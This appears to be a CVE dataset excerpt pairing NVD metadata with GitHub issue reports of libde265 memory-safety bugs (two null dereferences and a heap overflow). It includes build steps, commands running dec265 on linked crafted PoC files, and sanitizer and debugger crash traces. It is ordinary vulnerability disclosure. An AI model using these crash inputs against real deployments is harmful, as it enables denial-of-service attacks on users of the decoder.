"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/strukturag/libde265/issues/385 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function put_unweighted_pred_16_fallback at fallback-motion.cc:179
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <[email protected]>
Date: Sat Jan 28 15:03:34 2023 +0100
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv09.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: slice header invalid
WARNING: CTB outside of image area (concealing stream error...)
WARNING: slice header invalid
WARNING: slice header invalid
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: slice header invalid
WARNING: non-existing PPS referenced
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3774965==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x5555555e7237 bp 0x7ffffffe28d0 sp 0x7ffffffe2880 T0)
==3774965==The signal is caused by a WRITE memory access.
==3774965==Hint: address points to the zero page.
#0 0x5555555e7236 in put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int) /home/fuzz/libde265/libde265/fallback-motion.cc:179
#1 0x5555557b9ed3 in acceleration_functions::put_unweighted_pred(void*, long, short const*, long, int, int, int) const ../libde265/acceleration.h:262
#2 0x5555557a2a90 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:611
#3 0x5555557b973e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2155
#4 0x555555683316 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4136
#5 0x5555556878c1 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4497
#6 0x555555689e17 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#7 0x555555672a97 in read_coding_tree_unit(thread_context*) /home/fuzz/libde265/libde265/slice.cc:2861
#8 0x55555568af7b in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#9 0x55555568ea3f in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#10 0x55555558c205 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#11 0x55555558d6c0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#12 0x55555558a7dc in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#13 0x555555589efc in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#14 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#15 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#16 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#17 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#18 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
#19 0x5555555712ed in _start (/home/fuzz/libde265/dec265/dec265+0x1d2ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/fuzz/libde265/libde265/fallback-motion.cc:179 in put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)
==3774965==ABORTING
```
# POC
[poc_segv09.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv09.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv09.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: slice header invalid
WARNING: CTB outside of image area (concealing stream error...)
WARNING: slice header invalid
WARNING: slice header invalid
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: slice header invalid
WARNING: non-existing PPS referenced
Program received signal SIGSEGV, Segmentation fault.
0x00005555555e7237 in put_unweighted_pred_16_fallback (dst=0x0, dststride=0, src=0x7ffffffe6c00, srcstride=8, width=8, height=8, bit_depth=10) at fallback-motion.cc:179
179 out[0] = Clip_BitDepth((in[0] + offset1)>>shift1, bit_depth);
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x00005555555e7226 put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1689 test %sil,%sil
0x00005555555e7229 put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1692 je 0x5555555e7233 <put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1702>
0x00005555555e722b put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1694 mov %rdx,%rdi
0x00005555555e722e put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1697 callq 0x555555570ef0 <__asan_report_store2@plt>
0x00005555555e7233 put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1702 mov -0x8(%rbp),%rdx
0x00005555555e7237 put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1706 mov %cx,(%rdx)
0x00005555555e723a put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1709 mov -0x10(%rbp),%rdx
0x00005555555e723e put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1713 lea 0x2(%rdx),%rsi
0x00005555555e7242 put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1717 mov %rsi,%rdx
0x00005555555e7245 put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1720 mov %rdx,%rcx
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ─────────────────────────────────────────────────────────────���─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x000055555581d520 rbx 0x00007ffffffeed20 rcx 0x0000000000000000 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x00007ffffffe2880 rsp 0x00007ffffffe2830
r8 0x0000000000000001 r9 0x0000000000000008 r10 0x00005555555e6b8d r11 0x0000000000000020 r12 0x000055555581d520 r13 0x0000000000000010 r14 0x00000fffffffc54c r15 0x00007ffffffe2a60
rip 0x00005555555e7237 eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
174 for (int y=0;y<height;y++) {
175 const int16_t* in = &src[y*srcstride];
176 uint16_t* out = &dst[y*dststride];
177
178 for (int x=0;x<width;x+=2) {
179 out[0] = Clip_BitDepth((in[0] + offset1)>>shift1, bit_depth);
180 out[1] = Clip_BitDepth((in[1] + offset1)>>shift1, bit_depth);
181 out+=2; in+=2;
182 }
183 }
─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[0] from 0x00005555555e7237 in put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1706 at fallback-motion.cc:179
[1] from 0x00005555557b9ed4 in acceleration_functions::put_unweighted_pred(void*, long, short const*, long, int, int, int) const+484 at ../libde265/acceleration.h:262
[2] from 0x00005555557a2a91 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+22773 at motion.cc:611
[3] from 0x00005555557b973f in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+496 at motion.cc:2155
[4] from 0x0000555555683317 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int)+2790 at slice.cc:4136
[5] from 0x00005555556878c2 in read_coding_unit(thread_context*, int, int, int, int)+14437 at slice.cc:4497
[6] from 0x0000555555689e18 in read_coding_quadtree(thread_context*, int, int, int, int)+3873 at slice.cc:4652
[7] from 0x0000555555672a98 in read_coding_tree_unit(thread_context*)+1351 at slice.cc:2861
[8] from 0x000055555568af7c in decode_substream(thread_context*, bool, bool)+4333 at slice.cc:4741
[9] from 0x000055555568ea40 in read_slice_segment_data(thread_context*)+1762 at slice.cc:5054
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 3779666 name dec265 from 0x00005555555e7237 in put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1706 at fallback-motion.cc:179
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg dst = 0x0: Cannot access memory at address 0x0, dststride = 0, src = 0x7ffffffe6c00: 0, srcstride = 8, width = 8, height = 8, bit_depth = 10
loc x = 0, in = 0x7ffffffe6c00: 0, out = 0x0: Cannot access memory at address 0x0, y = 0, shift1 = 4, offset1 = 8, __PRETTY_FUNCTION__ = "void put_unweighted_pred_16_fallback(uint16_t*, ptrdiff_t, const int16_t*, ptrdiff_t, int, int, int…
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file.
| NULL Pointer Dereference in function put_unweighted_pred_16_fallback at fallback-motion.cc:179 | https://api.github.com/repos/strukturag/libde265/issues/385/comments | 2 | 2023-01-29T08:16:20Z | 2023-03-04T07:42:01Z | https://github.com/strukturag/libde265/issues/385 | 1,561,181,036 | 385 |
CVE-2023-24758 | 2023-03-01T15:15:11.743 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_weighted_pred_avg_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/383"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/strukturag/libde265/issues/383 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function ff_hevc_put_weighted_pred_avg_8_sse at sse-motion.cc:254
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <[email protected]>
Date: Sat Jan 28 15:03:34 2023 +0100
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv06.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3499875==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555570c79d bp 0x7ffffffe28e0 sp 0x7ffffffe24f0 T0)
==3499875==The signal is caused by a WRITE memory access.
==3499875==Hint: address points to the zero page.
#0 0x55555570c79c in _mm_storel_epi64(long long __vector(2)*, long long __vector(2)) /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:733
#1 0x55555570c79c in ff_hevc_put_weighted_pred_avg_8_sse(unsigned char*, long, short const*, short const*, long, int, int) /home/fuzz/libde265/libde265/x86/sse-motion.cc:254
#2 0x5555557b9c19 in acceleration_functions::put_weighted_pred_avg(void*, long, short const*, short const*, long, int, int, int) const ../libde265/acceleration.h:249
#3 0x5555557a1a6a in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:544
#4 0x5555557b973e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2155
#5 0x5555556848c0 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4314
#6 0x555555689e17 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#7 0x555555689940 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4635
#8 0x555555672a97 in read_coding_tree_unit(thread_context*) /home/fuzz/libde265/libde265/slice.cc:2861
#9 0x55555568af7b in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#10 0x55555568ea3f in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#11 0x55555558c205 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#12 0x55555558d6c0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#13 0x55555558a7dc in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#14 0x555555589efc in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#15 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#16 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#17 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#18 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#19 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
#20 0x5555555712ed in _start (/home/fuzz/libde265/dec265/dec265+0x1d2ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:733 in _mm_storel_epi64(long long __vector(2)*, long long __vector(2))
==3499875==ABORTING
```
# POC
[poc_segv06.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv06.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv06.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
Program received signal SIGSEGV, Segmentation fault.
0x000055555570c79d in _mm_storel_epi64(long long __vector(2)*, long long __vector(2)) (__B=..., __P=0x0) at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:733
733 *(__m64_u *)__P = (__m64) ((__v2di)__B)[0];
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x000055555570c787 _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+109 je 0x55555570c796 <ff_hevc_put_weighted_pred_avg_8_sse(unsigned char*, long, short const*, short const*, long, int, int)+2984>
0x000055555570c789 _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+111 mov $0x8,%esi
0x000055555570c78e _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+116 mov %rdx,%rdi
0x000055555570c791 _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+119 callq 0x555555571040 <__asan_report_store_n@plt>
0x000055555570c796 _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+124 mov -0x358(%rbp),%rdx
0x000055555570c79d _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+131 mov %r8,(%rdx)
0x000055555570c7a0 _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+134 nop
~
~
~
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x000055555581d520 rbx 0x00007ffffffeed40 rcx 0x0000000000000000 rdx 0x0000000000000000 rsi 0x0000000000000007 rdi 0x0000000000000000 rbp 0x00007ffffffe2890 rsp 0x00007ffffffe24a0
r8 0x0000000000000000 r9 0x0000000000000000 r10 0x0000000000000040 r11 0x0000000000000040 r12 0x000055555581d520 r13 0x0000000000000010 r14 0x00000fffffffc550 r15 0x00007ffffffe2a80
rip 0x000055555570c79d eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
728 }
729
730 extern __inline void __attribute__((__gnu_inline__, __always_inline__, __artificial__))
731 _mm_storel_epi64 (__m128i_u *__P, __m128i __B)
732 {
733 *(__m64_u *)__P = (__m64) ((__v2di)__B)[0];
734 }
735
736 extern __inline void __attribute__((__gnu_inline__, __always_inline__, __artificial__))
737 _mm_storeu_si64 (void *__P, __m128i __B)
─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[0] from 0x000055555570c79d in _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+131 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:733
[1] from 0x000055555570c79d in ff_hevc_put_weighted_pred_avg_8_sse(unsigned char*, long, short const*, short const*, long, int, int)+2991 at sse-motion.cc:254
[2] from 0x00005555557b9c1a in acceleration_functions::put_weighted_pred_avg(void*, long, short const*, short const*, long, int, int, int) const+282 at ../libde265/acceleration.h:249
[3] from 0x00005555557a1a6b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+18639 at motion.cc:544
[4] from 0x00005555557b973f in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+496 at motion.cc:2155
[5] from 0x00005555556848c1 in read_coding_unit(thread_context*, int, int, int, int)+2148 at slice.cc:4314
[6] from 0x0000555555689e18 in read_coding_quadtree(thread_context*, int, int, int, int)+3873 at slice.cc:4652
[7] from 0x0000555555689941 in read_coding_quadtree(thread_context*, int, int, int, int)+2634 at slice.cc:4635
[8] from 0x0000555555672a98 in read_coding_tree_unit(thread_context*)+1351 at slice.cc:2861
[9] from 0x000055555568af7c in decode_substream(thread_context*, bool, bool)+4333 at slice.cc:4741
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 3508110 name dec265 from 0x000055555570c79d in _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+131 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:733
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg __B = {[0] = 0, [1] = 0}, __P = 0x0: Cannot access memory at address 0x0
loc x = 0, y = 0, dst = 0x0: Cannot access memory at address 0x0, r0 = {[0] = 0, [1] = 0}, r1 = {[0] = 0, [1] = 0}, f0 = {[0] = 18014673391583296, [1] = 18014673391583296}, r2 = {[0] = 0, [1] = 0}, r3 = {[0] = 0, [1] = 0}
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file. | NULL Pointer Dereference in function ff_hevc_put_weighted_pred_avg_8_sse at sse-motion.cc:254 | https://api.github.com/repos/strukturag/libde265/issues/383/comments | 2 | 2023-01-29T08:15:05Z | 2023-03-04T07:42:17Z | https://github.com/strukturag/libde265/issues/383 | 1,561,180,747 | 383 |
CVE-2023-25221 | 2023-03-01T15:15:11.803 | Libde265 v1.0.10 was discovered to contain a heap-buffer-overflow vulnerability in the derive_spatial_luma_vector_prediction function in motion.cc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/388"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/strukturag/libde265/issues/388 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
heap-buffer-overflow in function derive_spatial_luma_vector_prediction at motion.cc:1894
# Version
```
git log
commit bfb6de155f9fb015d2904cb4ef07809f17995276 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <[email protected]>
Date: Sun Jan 29 12:20:48 2023 +0100
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_hbo01.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: Too many warnings queued
=================================================================
==3163634==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00000ae1c at pc 0x5555557b561f bp 0x7ffffffee780 sp 0x7ffffffee770
READ of size 1 at 0x61b00000ae1c thread T0
#0 0x5555557b561e in derive_spatial_luma_vector_prediction(base_context*, de265_image*, slice_segment_header const*, int, int, int, int, int, int, int, int, int, int, unsigned char*, MotionVector*) /home/fuzz/libde265/libde265/motion.cc:1894
#1 0x5555557b708b in fill_luma_motion_vector_predictors(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, int, int, int, MotionVector*) /home/fuzz/libde265/libde265/motion.cc:1960
#2 0x5555557b82d3 in luma_motion_vector_prediction(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2033
#3 0x5555557b92d3 in motion_vectors_and_ref_indices(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int, PBMotion*) /home/fuzz/libde265/libde265/motion.cc:2119
#4 0x5555557b982d in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2157
